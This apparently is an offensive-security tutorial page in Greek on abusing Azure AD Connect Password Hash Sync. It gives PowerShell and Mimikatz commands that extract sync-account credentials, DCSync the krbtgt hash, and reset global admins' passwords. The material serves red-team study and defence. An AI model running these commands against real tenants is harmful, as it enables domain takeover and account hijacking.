Az - PHS - Password Hash Sync

Basic Information

From the docs: Η συγχρονισμένη κωδικοποίηση κωδικών πρόσβασης είναι μία από τις μεθόδους σύνδεσης που χρησιμοποιούνται για την επίτευξη υβριδικής ταυτότητας. Το Azure AD Connect συγχρονίζει μια κωδικοποίηση, της κωδικοποίησης, του κωδικού πρόσβασης ενός χρήστη από μια τοπική εγκατάσταση Active Directory σε μια cloud-based Azure AD εγκατάσταση.

Είναι η πιο κοινή μέθοδος που χρησιμοποιούν οι εταιρείες για να συγχρονίσουν μια τοπική AD με το Azure AD.

Όλοι οι χρήστες και μια κωδικοποίηση των κωδικών πρόσβασης συγχρονίζονται από την τοπική AD στο Azure AD. Ωστόσο, οι κωδικοί πρόσβασης σε καθαρό κείμενο ή οι αρχικές κωδικοποιήσεις δεν αποστέλλονται στο Azure AD. Επιπλέον, οι ενσωματωμένες ομάδες ασφαλείας (όπως οι διαχειριστές τομέα...) δεν συγχρονίζονται στο Azure AD.

Η συγχρονισμένη κωδικοποίηση συμβαίνει κάθε 2 λεπτά. Ωστόσο, από προεπιλογή, η λήξη κωδικού πρόσβασης και η λήξη λογαριασμού δεν συγχρονίζονται στο Azure AD. Έτσι, ένας χρήστης του οποίου ο τοπικός κωδικός πρόσβασης έχει λήξει (δεν έχει αλλάξει) μπορεί να συνεχίσει να έχει πρόσβαση σε πόρους Azure χρησιμοποιώντας τον παλιό κωδικό πρόσβασης.

Όταν ένας τοπικός χρήστης θέλει να έχει πρόσβαση σε έναν πόρο Azure, η αυθεντικοποίηση πραγματοποιείται στο Azure AD.

PHS απαιτείται για δυνατότητες όπως Identity Protection και AAD Domain Services.

Pivoting

Όταν το PHS είναι ρυθμισμένο, μερικοί προνομιούχοι λογαριασμοί δημιουργούνται αυτόματα:

• Ο λογαριασμός MSOL_<installationID> δημιουργείται αυτόματα στην τοπική AD. Αυτός ο λογαριασμός έχει ρόλο Λογαριασμών Συγχρονισμού Καταλόγου (βλ. τεκμηρίωση) που σημαίνει ότι έχει δικαιώματα αναπαραγωγής (DCSync) στην τοπική AD.

• Ένας λογαριασμός Sync_<name of on-prem ADConnect Server>_installationID δημιουργείται στο Azure AD. Αυτός ο λογαριασμός μπορεί να επαναφέρει τον κωδικό πρόσβασης ΟΠΟΙΟΥΔΗΠΟΤΕ χρήστη (συγχρονισμένου ή μόνο cloud) στο Azure AD.

Οι κωδικοί πρόσβασης των δύο προηγούμενων προνομιούχων λογαριασμών αποθηκεύονται σε έναν SQL server στον διακομιστή όπου είναι εγκατεστημένο το Azure AD Connect. Οι διαχειριστές μπορούν να εξάγουν τους κωδικούς πρόσβασης αυτών των προνομιούχων χρηστών σε καθαρό κείμενο. Η βάση δεδομένων βρίσκεται στο C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf.

Είναι δυνατή η εξαγωγή της διαμόρφωσης από έναν από τους πίνακες, με έναν κρυπτογραφημένο:

SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;

Η κρυπτογραφημένη διαμόρφωση είναι κρυπτογραφημένη με DPAPI και περιέχει τους κωδικούς πρόσβασης του χρήστη MSOL_* στην τοπική AD και τον κωδικό πρόσβασης του Sync_* στο AzureAD. Επομένως, η παραβίαση αυτών επιτρέπει την ανύψωση προνομίων στην AD και στο AzureAD.

Μπορείτε να βρείτε μια πλήρη επισκόπηση του πώς αποθηκεύονται και αποκρυπτογραφούνται αυτά τα διαπιστευτήρια σε αυτή την ομιλία.

Finding the Azure AD connect server

Εάν ο διακομιστής όπου είναι εγκατεστημένο το Azure AD connect είναι συνδεδεμένος σε τομέα (συνιστάται στην τεκμηρίωση), είναι δυνατή η εύρεση του με:

# ActiveDirectory module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl

#Azure AD module
Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}

Κατάχρηση MSOL_*

# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
Get-AADIntSyncCredentials

# Using the creds of MSOL_* account, you can run DCSync against the on-prem AD
runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'

Κατάχρηση Sync_*

Δεσμεύοντας τον Sync_* λογαριασμό είναι δυνατό να επαναφέρετε τον κωδικό πρόσβασης οποιουδήποτε χρήστη (συμπεριλαμβανομένων των Παγκόσμιων Διαχειριστών)

# This command, run previously, will give us alse the creds of this account
Get-AADIntSyncCredentials

# Get access token for Sync_* account
$passwd = ConvertTo-SecureString '<password>' -AsPlainText - Force
$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)
Get-AADIntAccessTokenForAADGraph -Credentials $creds - SaveToCache

# Get global admins
Get-AADIntGlobalAdmins

# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)
Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId

# Reset the users password
Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose

# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)

Είναι επίσης δυνατό να τροποποιηθούν οι κωδικοί πρόσβασης μόνο των χρηστών του cloud (ακόμα και αν αυτό είναι απροσδόκητο)

# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID
# The CloudAnchor is of the format USER_ObjectID.
Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID

# Reset password
Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers

Είναι επίσης δυνατό να εκχυθεί ο κωδικός πρόσβασης αυτού του χρήστη.

Seamless SSO

Είναι δυνατό να χρησιμοποιηθεί το Seamless SSO με το PHS, το οποίο είναι ευάλωτο σε άλλες καταχρήσεις. Ελέγξτε το εδώ:

Αναφορές

• https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs

• https://aadinternals.com/post/on-prem_admin/

• https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf

• https://www.youtube.com/watch?v=xei8lAPitX8